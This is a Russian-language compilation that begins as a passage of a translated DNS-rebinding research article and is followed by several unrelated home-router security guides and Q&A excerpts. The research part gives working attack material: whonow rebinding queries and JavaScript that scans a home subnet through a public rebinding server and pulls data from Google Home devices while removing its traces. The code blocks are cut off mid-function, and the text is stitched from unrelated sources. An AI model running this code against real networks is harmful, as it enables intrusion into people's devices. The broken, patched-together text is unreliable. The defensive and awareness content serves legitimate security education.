Серьезность уязвимости и продолжающаяся халатность компании Radio Thermostat Company of America, которой потребовалось несколько лет для исправления проблемы – прекрасный пример, зачем нужно регулировать безопасность IoT-устройств на законодательном уровне.

Wi-Fi роутеры

Если вы продолжаете читать статью, то, скорее всего, у вас в голове возникла мысль, что другие устройства из домашней сети также могут быть уязвимы. Думаю, вас не удивит тот факт, что исторически сетевые роутеры в целом являются наиболее распространенной целью для атак, связанных с перепривязкой DNS.

Можно сказать, что сетевые роутеры хранят ключи от многих дверей. Если вы контролируете роутер, то, по сути, контролируете сеть. Существует два распространенных вектора с использованием перепривязки DNS:

1. Передача через POST-запрос со стандартными учетными записями на страницу наподобие http://192.168.1.1/login для авторизации в качестве администратора. Далее у злоумышленника появляется полный контроль над устройством и возможность конфигурирования сети.

2. Использование интерфейса Internet Gateway Device (IGD) через UPnP для настройки постоянных соединений для проброса портов и открытия произвольных UDP / TCP портов для доступа из публичного интернета.

Первый метод легко реализовать, поскольку покупатели зачастую не меняют стандартные учетные записи. Возможно, будет включено использование WPA2 и установлен пароль для Wi-Fi, но панель настройки для роутера будет доступна каждому по логину admin и паролю admin.

Второй сценарий еще хуже и представляет собой откровенную пародию. Так или иначе, у большинства современных домашних роутеров сервера UPnP включены по умолчанию. Эти сервера дают возможность настраивать роутер с правами администратора любой машине из сети без аутентификации через HTTP. Любой пользователь из локальной сети или интернета (через перепривязку DNS) может воспользоваться IGD/UPnP для настройки DNS-сервера роутера, добавить / удалить переадресацию портов для NAT и WAN, посмотреть объем трафика полученного/переданного в сети и получить доступ к публичному IP-адресу роутера (подробности на сайте upnp-hacks.org).

Через перепривязку DNS, направленную на UPnP сервер роутера, проделать дыру в фаерволе и оставить постоянную дверь для реализации других атак на базе протоколов TCP / UDP на устройства из сети, но без ограничений по HTTP, присутствующих у перепривязки DNS.

Злоумышленники могут даже настроить правила проброса портов для переадресации трафика на внешние IP-адреса и сделать роутер жертвы как часть большой сети инфицированных роутеров, используемой для маскировки трафика от государственных органов (подробнее в статье про UPnProxy).

IGD также позволяет обнаружить публичный IP-адрес роутера через простейший HTTP-запрос без авторизации. В комбинации с перепривязкой DNS можно деанонимизировать пользователей, пытающихся замаскировать публичный IP-адрес через VPN или TOR.

Однако, что касается перепривязки DNS в контексте роутеров, то все не так очевидно. Я видел роутеры, где полностью блокируется перепривязка DNS, а также роутеры с рандомизацией порта UPnP сервера с целью затруднения реализации подобного рода атак. С другой стороны, я сталкивался с роутерами полностью беззащитными к перепривязке DNS. Если честно, то мне не очень хочется разбираться и исследовать роутеры на предмет реализации перепривязки DNS. В основном потому, что я боюсь получить шокирующие результаты.

Безопасность локальной сети – иллюзия

Возникает закономерный вопрос. Почему так много устройств уязвимо к атаке десятилетней давности? Вероятно, причин больше, чем я думаю, но мне кажется, что основных – две.

Рисунок 6: Опрос на предмет осведомленности об атаках на базе перепривязки DNS

Первое, о чем стоит упомянуть – уровень осведомленности. Насколько я могу судить, перепривязка DNS не столь популярна, как могла бы быть. Конечно, некоторые специалисты могли слышать об этих атаках, но я почти уверен, что очень мало людей реально опробовали эту технологию на практике. Эта атака громоздка и трудна в реализации. Вы должны организовать вредоносный DNS-сервер в облаке, написать полезную нагрузку на JavaScript, заточенную под конкретную службу, передать полезную нагрузку жертве в целевой сети. Затем нужно понять, как использовать браузер жертвы для перехода на целевую машину, где работает нужная служба, IP-адрес которой, вероятно, вы не знаете. В общем, много накладных расходов и мало надежности. Я написал несколько утилит для упрощения задачи. Подробности далее.

Объявление в твиттере: «Требуются разработчики для написания программного обеспечения для работы с локальными частными сетями, как если бы эти сети были враждебными и публичными».

Даже если перепривязка DNS станет более популярной среди специалистов по кибербезопаности, нет гарантии, что мы увидим снижение числа зараженных устройств, поскольку API реализуется веб-разработчиками. Естественно, веб-разработчики должны знать, что для доступа к API извне должна быть авторизация. С другой стороны, существует распространение мнение, что локальные сети сами по себе защищены от вторжения из интернета, и локальные API перекладывают вопросы достоверности и безопасности на саму локальную сеть. Зачем нужна авторизация в REST API, если в роутере уже есть авторизация? Целые протоколы навроде UPnP реализованы на основе идеи, что устройства в сети доверяют друг другу. Эта концепция и является основным корнем проблемы.

Полная версия объявления в твиттере: «Требуются разработчики для написания программного обеспечения по работе с локальными сетями, как если бы эти сети были враждебными и публичными, поскольку мы не считаем локальные сети полностью безопасными. Если мы будем продолжать думать, что локальные сети безопасны, может пострадать много людей».

Защита от перепривязки DNS

Пользователи

Как пользователь какого-либо продукта или службы, вы часто зависите от создателя продукта. Однако в случае с перепривязкой DNS у вас есть некоторый контроль над ситуацией, и вы можете защититься от подобного рода угроз, изменив настройки роутера. Сервис OpenDNS Home бесплатен и может быть использовать для фильтрации подозрительных IP-адресов, как, например, частных IP-диапазонов в DNS-ответах. Нужно поменять DNS-сервер вашего роутера со стандартного на один из DNS-серверов, предоставляемых службой OpenDNS Home.

Если вы предпочитаете управлять фильтрацией самостоятельно и не доверяете публичным DNS-сервера, можете воспользоваться Dnsmasq или установить прошивку на роутере навроде DD-RT. Каждое из этих решений вполне уместно, если у вас есть доступ к роутеру. Однако будьте бдительными. Вы все еще можете оказаться жертвой перепривязки DNS, если сеть не защищена от подобного рода атак.

Разработчики

Если вы разработчик или участвуете в создании продукта с HTTP API, существует несколько способов защититься от подобного рода атак. Рассмотрим три простых метода.

Самое простое решение и без побочных эффектов – добавить проверку заголовка «Host» на стороне HTTP-сервер. Этот заголовок добавляется во все HTTP-запросы, отсылаемые современными браузерами и содержит адрес сервера (hostname:port) для коммуникации. В качестве адреса сервера может выступать имя домена или IP-адреса, однако в любом случае после получения запроса нужно проверить, что хост в заголовке совпадает с хостом сервера.

Поскольку перепривязка DNS основывается на изменении IP-адреса, связанного с именем домена, заголовок Host во вредоносном HTTP-запросе, направляемом в целевую службу будет содержать оригинальное имя домена. Вредоносный POST-запрос, используемый на странице авторизации роутера, будет иметь значение заголовка Host, отличающееся от имени хоста или IP-адреса роутера. Соответственно, вредоносный заголовок будет выглядеть примерно так Host: malicious.website. Веб-серверам следует проверять, что запрашиваемый заголовок Host в точности совпадает с настоящим именем хоста. В противном случае должен возвращаться HTTP-статус с кодом 403 (Forbidden). Я написал NPM-модуль с вышеописанным функционалом для веб-серверов Express.js. Схожее решение для другого сервера или на другом языке реализовать довольно просто.

Еще один эффективный метод для защиты от перепривязки DNS – вместо HTTP использовать HTTPS даже в локальных сетях. Во время перепривязки у целевой службы будет SSL-сертификат, который окажется невалидным для сайта malicious.website, и запрос к API будет заблокирован. В качестве бонуса у пользователей повысится безопасность в целом и появится все фишки, присутствующие в TLS/SSL. Обычно производители не поставляют IoT-устройства с TLS/SSL сертификатами, однако в медиа-сервере Plex проблема решена оригинальным образом, когда перепривязка DNS используется для выпуска сертификатов и защиты покупателей!

Вероятно, наилучшее решение, хотя с возможными побочными эффектами для вашей системы – добавить аутентификацию в API. Если на API завязан важный функционал или доступ к конфиденциальной информации, то права должны быть ограничены. К этому API не должно быть доступа у всех из локальной сети и тем более из публичного интернета (соответственно, и через привязку DNS тоже). Нет никакой необходимости в том, чтобы у любого устройства в беспроводной был полный контроль над температурой в помещении. Мы часто забываем, как легко взломать WPA2.

Инструменты для реализации перепривязки DNS

Для повышения осведомленности о перепривязки DNS я создал утилиты и библиотеки, чтобы вы могли попробовать реализовать подобные атаки на практике. Помимо полезной нагрузки на JavaScript, написанной для целевого устройства или службы, схема доставки полезной нагрузки, взаимодействие с вредоносным DNS-сервером и перечисления хостов в сети жертвы во многом схожи от случая к случаю. Все инструменты идут с открытым исходным кодом, и вы можете легко разобраться и сымитировать перепривязку DNS.

· «Вредоносный» DNS-сервер: whonow

· Библиотека на JavaScript для фронтэнда: DNS rebind toolkit

Whonow

Whonow представляет собой DNS-сервер, позволяющий динамически настраивать ответы и правила перепривязки при помощи все тех же запросов к домену. Пример:

# respond to DNS queries for this domain with 34.192.228.43 the first

# time it is requested and then 192.168.1.1 every time after that.

A.34.192.228.43.1time.192.168.1.1.forever.rebind.network

# respond first with 34.192.228.43, then 192.168.1.1 the next five

# times, and then start all over again (1, then 5, forever…)

A.34.192.228.43.1time.192.168.1.1.5times.repeat.rebind.network

При использовании динамических правил для перепривязки DNS нам не нужно разворачивать собственный DNS-сервер для эксплуатации политики ограничения домена браузера. Каждый может использовать публичный сервер whonow, работающий на порту 53 по адресу rebind.network.

Прямо сейчас можно воспользоваться утилитой dig и отправить запрос к публичному серверу. Сервер будет отвечать на запросы для доменных имен *rebind.network.

# dig is a unix command for making DNS requests

dig A.10.10.10.50.forever.rebind.network

;; QUESTION SECTION:

;10.10.10.50.forever.rebind.network. IN A

;; ANSWER SECTION:

10.10.10.50.forever.rebind.network. 1 IN A 10.10.10.50

Whonow всегда устанавливает значение TTL равным одной секунде, и ответы не будут долго находиться в кэше DNS-резольвера.

Рисунок 7: Ответы публичного сервера whonow

DNS Rebind Toolkit

DNS Rebind Toolkit представляет собой библиотеку для автоматизации атак на базе перепривязки DNS. Как только вы написали полезную нагрузку на JavaScript для целевой службы, эта библиотека позволит вам реализовать атаку в сети жертвы.

· Используется утечка IP-адресов в WebRTC для выяснения локального IP-адреса жертвы.

· Автоматизирован перебор диапазона подсети, и вы можете скомпрометировать устройства, IP-адреса которых не известны.

· Автоматизирована перепривязка DNS. Возвращается объект Promise, который резолвится после успешного завершения перепривязки.

· Используется сервер whonow. Нет необходимости разворачивать собственный DNS-сервер для реализации перепривязки.

· Предусмотрено несколько полезных нагрузок для атаки на наиболее распространенные IoT устройства. Изучая хорошо задокументированные примеры, вы можете написать собственные эксплоиты.

Реализация атаки против устройства Google Home в подсети 192.168.1.1/24 не сложнее, чем внедрить код в страницу index.html.

// JS in index.html

DNSRebindAttack.getLocalIPAddress()

.then(ip => launchRebindAttack(ip))

.catch(err => {

    console.error(err)

    // Looks like our nifty WebRTC leak trick didn't work

    // No biggie, most home networks are 192.168.1.1/24 anyway.

    launchRebindAttack('192.168.1.1')

})

function launchRebindAttack(localIp) {

    // convert 192.168.1.1 into array from 192.168.1.0 - 192.168.1.255

    const first3Octets = localIp.substring(0, localIp.lastIndexOf('.'))

    const ips = [...Array(256).keys()].map(octet => `${first3Octets}.${octet}`)

    // The first argument is the domain name of a publicly accessible

    // whonow server (https://github.com/brannondorsey/whonow).

    // I've got one running on port 53 of rebind.network you can to use.

    // Google Home's undocumented HTTP API server runs on port 8008

    const rebind = new DNSRebindAttack('rebind.network', 8008)

    // Launch a DNS Rebind attack, spawning 255 iframes

    rebind.attack(ips, '127.0.0.1', 'payload/google-home.html')

Файл index.html инициирует атаку, создавай iframe для каждого IP-адреса в массиве, передаваемого в rebind.attack(…). В каждый iframe содержит payloads/google-home.html со следующим сниппетом:

// JS in payloads/google-home.html

attack()

.then((json) => {

          console.log('The attack was successful! Here is the JSON it exfiltrated:')

          console.log(json)

},

      err => {

          // there probably isn't even a machine with this IP address...

          console.error('No Google Home found at this IP ')

// remove the iframe from index.html once the attack is complete.

// Leave no trace ;)

.then(() => DNSRebindNode.destroy())

async function attack() {

    // a helper function that returns some fetch() options configured with

    // certain useful headers

    const getOptions = DNSRebindNode.fetchOptions()

    try {

        const opts = { fetchOptions: getOptions }

        return await DNSRebindNode.rebind(`http://${location.host}/setup/eureka_info`, opts).then(data => data.json())

    } catch (err) {

        return Promise.reject(err)

Ссылки и благодарности

Я благодарю Лили Хэй Ньюмэн за три месяца плодотворных разговоров, которые привели к освещению этого исследования в журнале WIRED. Огромная благодарность Вильяму Робертсону за помощь в моей работе и особенно за разрешение поэкспериментировать в домашней сети и над устройством Sonos. Также благодарю отделы безопасности Roku и Sonos за быструю реакцию, разработку, выпуск обновлений для прошивок и защиты пользователей от атак на базе перепривязки DNS.

Ниже приведен перечень статей и ресурсов, имеющих отношение к перепривязке DNS, которые мне очень помогли во время исследования. Надеюсь, для вас эти ссылки тоже окажутся полезными:

Как защитить домашний wi-fi роутер от взлома

Евгений не поставил пароль на вайфай в своей квартире. Зачем заморачиваться? Пароль можно забыть. А то, что соседи могут пользоваться, — не жалко, всё равно интернет безлимитный.

Николай Кругликов

юный хакер

Так думает Евгений, и он крупно ошибается. Разберемся, почему открытый интернет дома — плохая идея и чем это может вам грозить.

Прослушивание

Точки доступа без пароля еще называют открытыми, и дело тут не только в пароле. В таких точках данные по вайфаю передаются без шифрования, в открытом виде. Поскольку вайфай — те же радиоволны, перехватить трафик очень легко: достаточно настроить антенну на нужную частоту и вы услышите всё, что передается между роутером и компьютером. Без пароля на роутере вы просто транслируете на всю округу, что вы сейчас делаете в интернете.

Если вы сидите на порносайте, любой ваш сосед сможет узнать, какой именно ролик вы смотрите. Если отправляете письмо, с большой вероятностью его можно будет перехватить в момент отправки. Если у вас «Вконтакте» без шифрования, то любой сосед сможет прочитать ваши личные сообщения.

Как не попасться на удочку хакеров

Вайфай без пароля легко прослушать

Как защититься. Нужно поставить пароль на вайфай. Конечно, соединения с некоторыми сайтами шифруются с помощью HTTPS, а еще можно включить VPN, и всё же гораздо надежнее защитить сразу весь канал связи.

Упражнение: ставим пароль на вайфай

Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Появится окошко с полями для логина и пароля.
Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру. Скорее всего, это что-то простое. Иногда логин и пароль написаны прямо на корпусе роутера.
Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется экран, где можно поменять пароль.

Если ничего не получается, вызовите мастера. Задача мастеру — запаролить ваш вайфай.

Установите для вайфая пароль длиной не менее десяти символов из цифр и букв. Пароль 12345678 — то же, что отсутствие пароля.

Все инструкции рассчитаны на домашний роутер. На работе или в кафе они вряд ли сработают, потому что сетевые администраторы отключают доступ к настройкам роутера для посторонних

Возможно, в настройках будет несколько вариантов шифрования. В каждом роутере разный набор опций, поэтому выберите вариант, наиболее похожий на WPA2-PSK (AES). Это самый надежный на сегодняшний день протокол шифрования. В сочетании с хорошим паролем он даст вам максимальную возможную защиту.

Надежный протокол шифрования — это важно. Плохой протокол, как и плохой пароль, облегчает взлом. Например, устаревший протокол WEP можно взломать за несколько часов.

Выбор алгоритма шифрования в настройках роутера. WPA2-PSK — лучший вариант из этого набора

Убедитесь, что у вас выключен WPS. Эта технология позволяет подключаться к роутеру по пину из восьми цифр. К сожалению, после массового внедрения WPS выяснилось, что он крайне небезопасен: нужно всего 10 часов, чтобы взломать соединение даже с самым надежным протоколом. Настройки WPS где-то там же, где и настройки вайфая.

Манипуляции с настройками роутера

Когда хакеры подключаются к вашему вайфаю, они получают доступ к панели управления роутером и могут перенастроить его на свой лад. Чтобы влезть в ваш роутер, достаточно просто подключиться к вайфаю — находиться в квартире необязательно. Какой-нибудь пакостный школьник может ковыряться в настройках вашего роутера прямо сейчас.

Обычно попасть в настройки роутера не так просто: нужно ввести логин и пароль. Но у большинства людей на роутере стоят стандартные логин и пароль — admin / admin. Если вы не меняли эту настройку специально, велика вероятность, что любой хакер сможет влезть в роутер.

Получив доступ к панели управления, хакеры легко проведут атаку посредника: сделают так, чтобы между вами и сайтом стоял зловредный сервис, который ворует пароли. Например, по адресу tinkoff.ru будет открываться не настоящий, а поддельный сайт, который будет отправлять им всё, что вы вводите. Вы даже не узнаете, что попали на зловредный сервис: он будет выглядеть в точности как настоящий интернет-банк и даже пустит вас по вашему логину и паролю. Но при этом логин и пароль окажутся у хакеров.

Роутер со стандартными настройками легко перенаправить на поддельный сайт

Как защититься. Смените в настройках роутера стандартный пароль администратора на свой. Он должен быть не менее надежным, чем пароль от вайфая, и при этом должен быть другим.

Удаленный доступ

Хакеры редко интересуются конкретно вами, если вы не топ-менеджер крупной компании. Чаще обычные люди попадают под автоматизированные атаки, когда хакерская программа ищет потенциальных жертв и пытается применить стандартный алгоритм взлома.

В некоторых роутерах есть возможность подключаться к веб-интерфейсу из внешней сети — то есть зайти в настройки роутера можно из любого места, где есть интернет, а не только из дома.

Это значит, что на ваш роутер могут напасть не только пакостливые школьники. Атака может происходить не целенаправлено: просто какой-нибудь хакер в Перу сканирует определенный диапазон адресов на предмет открытых роутеров. Его программа видит ваш роутер. Подключается. Хакер даже не знает, кто вы и где вы — он просто настраивает переадресацию и возвращается к своим делам. И в его хакерскую программу падает ваш логин от Фейсбука, например.

Как защититься от сетевых хулиганов в общественных местах

Хакеры совершают автоматизированные атаки на роутеры,
в которых разрешен удаленный доступ

Как защититься. Проверьте, включена ли функция удаленного доступа в вашем роутере. Она часто есть в устройствах, которые дают провайдеры связи. Провайдерам удаленный доступ нужен для дела: так им проще помогать пользователям с настройкой сети. Тем не менее провайдеры могут оставить в веб-интерфейсе пароль по умолчанию, что делает вас легкой добычей хакерских программ.

Если вы можете зайти в веб-интерфейс со стандартными логином и паролем admin / admin, обязательно поменяйте пароль и запишите его. Когда провайдер будет настраивать ваш роутер удаленно, просто скажите, что поменяли пароль из соображений безопасности, и продиктуйте его оператору.

Инструкция по защите роутера

Поставьте на вайфай надежный пароль.
Смените стандартный пароль администратора.
Если роутер не от провайдера, отключите удаленный доступ.
Если не знаете, как это всё сделать, вызовите компьютерного мастера, которому вы доверяете.

Как обезопасить домашнюю сеть: защищаем роутер от атак

Сегодня роутер имеется буквально во всех квартирах и частных домах, ведь без интернета никуда. И от него напрямую зависит уровень безопасности домашней сети. Если роутер слабо защищен – это ставит под угрозу все подключенные к нему устройства.

Основные виды угроз для безопасности ваших данных

Если роутер будет заражен вирусами, то вы можете столкнуться со следующими неприятными моментами как:

перенаправление на web-страницы, похищающие учетные данные;
принуждение к установке вредоносного ПО;
проведение MITM-атак.

Также ваш ПК или ноутбук могут использовать для шпионажа через Интернет вещей, скрытого майнинга криптовалют или запуска DDoS-атак на сайты.

Чтобы это предотвратить, требуется грамотная настройка параметров роутера.

Повышаем уровень защиты роутера

Доступ к настройкам админа можно получить по беспроводному соединению. Для этого надо лишь ввести в браузере (в строке URL-адреса) IP-адрес вашего роутера. Это можно делать как с компьютера, так и со смартфона, заранее установив на него специальное приложение.

1. Измените пароль

В первую очередь надо изменить пароль. Ведь стандартные комбинации вроде «admin», «administrator» или «user» знают все, и путем простого перебора определить ваш вариант несложно.

Для надежной защиты придумайте длинный пароль на 10-15 символов, состоящий из больших и маленьких букв, цифр, специальных символов. Либо воспользуйтесь любым генератором паролей.

Зачем это нужно? Дело в том, что у отдельных моделей и даже целых брендов имеются одинаковые регистрационные данные. Одни пользователи легко могут найти логин и пароль в интернете, а другие – просто отгадать, перепробовав наиболее распространенные варианты, которые они знают по опыту.

2. Измените название сети

Далее необходимо изменить название беспроводной сети. Обычно оно содержит в себе бренд и модель роутера. Понятно, что светить такую информацию – это лишнее. И выбирайте такое название, по которому будет трудно идентифицировать вас или ваше местоположение.

3. Отключите WPS

По умолчанию у многих роутеров включена опция Wi-Fi Protected Setup (WPS). Предназначена она для упрощенного подключения новых устройств. Но WPS могут использовать и злоумышленники – например, чтобы осуществить атаку на пароль.

4. Отключите UPnP

Также в роутерах по умолчанию используется функция Universal Plug and Play. Используется она для обеспечения нормальной связи между устройствами. Если UPnP вам не нужна, то лучшее ее отключить.

И дополнительно рекомендуется выключить все неиспользуемые протоколы и порты. Тем самым вы сможете предотвратить потенциальные атаки и повысить уровень защиты роутера.

Защищаем роутер от атак злоумышленников

Придумайте сложный и надежный пароль. Он должен отличаться от других вашей паролей, в том числе от той комбинации, которая используется для доступа к консоли администратора роутера.
Укажите протокол безопасности для Wi-Fi соединения. Единственно хорошим вариантом считается WPA2. Для домашней сети оптимальным будет персональный режим (WPA2-Personal или WPA2-PSK), так как он дополнен шифрованием AES. Шифрование защитит данные при передаче между ПК/смартфоном и роутером – даже если злоумышленник их перехватит, то посмотреть не сможет.
Не пользуйтесь старыми режимами безопасности Wi-Fi. К таковым относятся WPA и WEP. Есть WPA2 – ним и пользуйтесь.

Регулярное обновление ПО

Встроенное ПО роутера надо постоянно обновлять – как и на любом компьютере. Без обновлений могут появиться уязвимости, что позволит злоумышленникам легко проникнуть внутрь вашей сети.

Чтобы проверить актуальность обновлений, надо зайти в административную панель роутера. Современные модели обновляются в автоматическом режиме либо оповещают о выходе новой прошивки. На старых роутерах все надо делать вручную: заходить на сайт производителя и проверять, не появилось ли новое обновление.

Обновлять ПО нужно регулярно – как минимум пару раз в год. Только так можно защитить роутер от новых уязвимостей. Правда, бывает так, что для слишком старых моделей производитель уже не выпускает обновления. В этом случае рекомендуется купить новый роутер, поскольку другим способом защитить домашнюю сеть не получится.

Не забывайте, что помимо исправления уязвимостей регулярные обновления ПО улучшают производительность и добавляют новые функции – в том числе те, которые связаны с безопасностью. Это и делает их столь важными.

Создание отдельных сетей для разных устройств

Любой роутер поддерживает возможность создания нескольких сетей. Особенно это удобно при использовании Интернета вещей (IoT). Ведь в данном случае при применении технологии smart-дома надо выносить все устройства в отдельную подсеть – чтобы никто не смог воспользоваться их уязвимостями для получения данных на ПК или мобильных гаджетах. А для более высокой защиты роутера можно создать отдельную гостевую подсеть. Таким образом вы предотвратите риск доступа вредоносного ПО к важным файлам.

Кроме того, желательно выключить удаленное управление роутером. Так злоумышленникам будет труднее взломать устройство, ведь изменить какие-то параметры можно будет только при наличии физического доступа.

Заключение

Выше был перечислен далеко не полный список способов повышения уровня защиты роутера. Но и эти простые настройки помогут обезопасить вашу домашнюю сеть. Если же их проигнорировать, тогда злоумышленники могут не только получить доступ к личным данным, но и использовать вашу сеть для массовых атак и распространения других угроз.

Настраиваем безопасную сеть Wi-Fi за 7 шагов

Мы неоднократно писали про опасности, подстерегающие пользователей открытых беспроводных сетей, но сегодня хотелось бы поговорить об угрозах, специфичных для домашних сетей Wi-Fi. Многие владельцы беспроводных роутеров не считают эти угрозы серьезными, но мы попробуем развеять это заблуждение. Руководство ни в коем случае не является исчерпывающим, однако выполнение нескольких простых шагов позволит вам существенно повысить уровень безопасности сети.

Совет 1. Меняем пароль администратора

Одна из самых распространенных ошибок — использование установленного производителем по умолчанию пароля администратора (чаще всего это что-нибудь вроде «admin:admin» и тому подобные «1234»). В сочетании с какой-нибудь некритичной удаленной уязвимостью или с открытым для всех подключением к беспроводной сети это может дать злоумышленникам полный контроль над роутером. Мы настоятельно рекомендуем установить безопасный пароль, если вы этого еще не сделали.

Меняем пароль администратора

В качестве иллюстраций мы приводим скриншоты настройки роутера TP-Link. Разумеется, в маршрутизаторах других производителей меню выглядит иначе, но общая логика должна быть схожей.

Совет 2. Запрещаем удаленное управление

Вторая проблема — открытый доступ к интерфейсу управления роутером. Обычно производители по умолчанию разрешают администрировать устройство только из локальной сети, но так бывает далеко не всегда. Обязательно проверьте, доступен ли веб-интерфейс из Интернета.

Отключаем удаленное администрирование

Как правило, для отключения удаленного администрирования нужно убрать соответствующую галочку (в нашем случае с роутером TP-Link — ввести адрес 0.0.0.0). Также имеет смысл заблокировать доступ к роутеру из Глобальной сети по Telnet или SSH, если он поддерживает данные протоколы. Опытные пользователи могут ограничить возможности управления и в локальной сети — по аппаратным адресам устройств (так называемым MAC-адресам).

Совет 3. Отключаем Broadcast SSID

Как правило, беспроводной роутер сообщает всем желающим идентификатор вашей сети Wi-Fi (SSID). При желании такое поведение можно изменить, убрав соответствующую галочку в настройках. В этом случае злоумышленникам будет сложнее взломать сеть, но при настройке беспроводного подключения вам придется на каждом устройстве вводить ее имя вручную. Этот шаг необязателен.

Отключаем Broadcast SSID

Совет 4. Используем надежное шифрование

Нужно ли пускать всех желающих в беспроводную сеть при наличии дома безлимитного доступа в Интернет? Мы категорически не рекомендуем этого делать — среди «добропорядочных любителей халявы» может найтись один юный хакер, и здесь возникают угрозы, характерные для публичных хотспотов: кража данных учетных записей почтовых сервисов и социальных сетей, кража данных банковских карт, заражение домашних машин вирусами и так далее.

Включаем шифрование WPA2

Кроме того, вашу сеть злоумышленники смогут использовать для совершения мошеннических действий (полиция при этом придет к вам). Так что лучше всего включить шифрование WPA2 (алгоритм WEP недостаточно надежен) и установить безопасный пароль для подключения к Wi-Fi.

Совет 5. UPnP и все-все-все

Современные беспроводные маршрутизаторы умеют не только раздавать Wi-Fi и обеспечивать узлам локальной сети доступ в Интернет — как правило, они поддерживают разнообразные протоколы, позволяющие автоматически настраивать и соединять между собой подключенные «умные устройства».

Отключаем UPnP

Universal Plug and Play (UPnP), поддержку стандартов DLNA (Digital Living Network Alliance) и тому подобные вещи лучше отключать, если вы ими не пользуетесь, — так меньше шансов стать жертвой очередной уязвимости, найденной в ПО, использующем данные функции. Вообще это универсальное правило: все лишнее стоит отключить. Если что-то из отключенного вам потребуется, просто включите обратно, это несложно.

Совет 6. Обновляем встроенное ПО

Очень часто владельцы роутеров не следят за выходом свежих прошивок для своих устройств. Мы рекомендуем устанавливать актуальные версии встроенного ПО, скачанные с официальных сайтов производителей, — они исправляют ошибки и закрывают разнообразные уязвимости, позволяющие злоумышленникам взломать вашу сеть.

Обновляем прошивку

Инструкции по обновлению ПО обычно есть на соответствующей вкладке веб-интерфейса роутера. Вам нужно будет скачать образ прошивки, сделать резервную копию конфигурации (иногда старый файл нельзя использовать с новой прошивкой, и тогда придется настроить роутер заново), запустить процесс обновления и восстановить конфигурацию после перезагрузки.

Обновление прошивки роутера — самый простой и одновременно самый необходимый шаг
Tweet

Можно использовать сделанные энтузиастами сторонние прошивки для вашего устройства (например, OpenWRT), но делать это следует с осторожностью — нет гарантии, что роутер нормально запустится после обновления. Кроме того, написанное сторонними разработчиками ПО также следует скачивать только с официальных сайтов известных проектов — ни в коем случае не доверяйте продуктам из непонятных источников.

Совет 7. Не только роутер

Абсолютно надежной защиты не бывает — этот тезис доказан многолетней практикой. Грамотная настройка роутера, использование надежных паролей и алгоритмов шифрования, а также своевременное обновление встроенного ПО существенно повышают уровень безопасности беспроводной сети, но не дают стопроцентной гарантии от взлома.

Совет недели: безопасно подключаемся к Wi-Fi https://t.co/4Q2MP1dzKN pic.twitter.com/EXEYhNK4qm
— Евгений Касперский (@e_kaspersky_ru) September 4, 2014

Защититься можно лишь комплексно, поэтому мы рекомендуем использовать на компьютерах и мобильных устройствах современные брандмауэры и антивирусные программы с актуальными базами сигнатур зловредов. К примеру, Kaspersky Internet Security 2015 позволяет проверить уровень безопасности беспроводной сети и дает рекомендации по изменению ее настроек.

wifi — опасно ли использовать пароли администратора маршрутизатора по умолчанию, если в сети разрешены только доверенные пользователи?

Если какое-либо устройство, которое вы используете для беспроводной точки доступа, окажется скомпрометированным … если в этой сети есть конфиденциальная информация, у вас будут плохие времена.

Маловероятно, что кто-то воспользуется уязвимостью на вашем беспроводном маршрутизаторе? да.

Возможно ли это? да.

Если вы хоть немного серьезно относитесь к сетевой безопасности, вы должны ВСЕГДА менять пароль по умолчанию на вашем маршрутизаторе!

Помимо приличных устройств безопасности предприятия (скажем, тех, которые выполняют обычное сканирование сети, IDS, файлы пользовательских хостов — все эти забавные вещи), все еще нет ничего, что могло бы предотвратить проникновение вредоносных программ в вашу сеть и использование того факта, что для ваших паролей установлено значение по умолчанию.

В конце концов, ваши конечные пользователи заразят вашу сеть.

Это не может быть, это просто вопрос времени.

Допустим, «Яну по бухгалтерскому учету» 86 лет, и он хорошо разбирается в информационной безопасности.

Она более опасна, чем ВСЕ другие угрозы, с которыми вы можете сталкиваться изо дня в день.

Измените свой пароль. Измените имя пользователя по умолчанию.

Вы можете применить всевозможные защитные меры и по-прежнему будете скомпрометированы из-за имени пользователя и пароля по умолчанию.Недовольный сотрудник, кто-то умный и все еще изучающий сценарий, детка (когда вы ведете своего ребенка на работу), всякое может случиться.

Зачем нужен рост на предприятии?

И когда вы меняете этот пароль из любви к Богу, не делайте из него что-нибудь глупое. Я видел настройку сетей (открытые общие ресурсы с разрешением для всех … все кричат, что и где это … которые содержат невероятно конфиденциальную информацию) и пароль … для маршрутизатора, обращенного наружу, это что-то вроде ‘1234 # бизнес-имя’…. Я чувствую себя обязанным связаться с их клиентами и сообщить им, что они наняли компанию по управлению ИТ, которая не относится серьезно к безопасности.

С другой стороны, у меня есть дела поважнее.

Каждый раз, когда в них попадает крипто-локер, они в конечном итоге сталкиваются с последствиями.

Потеря клиента стоимостью 50 тысяч долларов в год может серьезно навредить небольшой компании.

wireless — Что может сделать злоумышленник, получив пароль от моего Wi-Fi роутера

Если злоумышленник получил ваш пароль Wi-Fi, но НЕ пароль администратора маршрутизатора (это не одно и то же!), То маловероятно, что злоумышленник сможет что-либо сделать, чтобы восстановить доступ к вашей сети.

Теоретически они могли атаковать устройства в вашей сети (например, ваш компьютер, телефон, Интернет вещей / «умный дом» или сам маршрутизатор), чтобы попытаться покинуть «черный ход». Насколько это будет сложно, зависит от того, какие устройства у вас есть в сети, насколько они изначально защищены от таких атак (телефоны, как правило, довольно хороши, Интернет вещей в целом очень плох), а также от того, предоставили ли вы им надежные пароли и другие конфигурации безопасности (домашняя маршрутизаторы обычно поставлялись с паролем по умолчанию — например, часто просто «admin»).

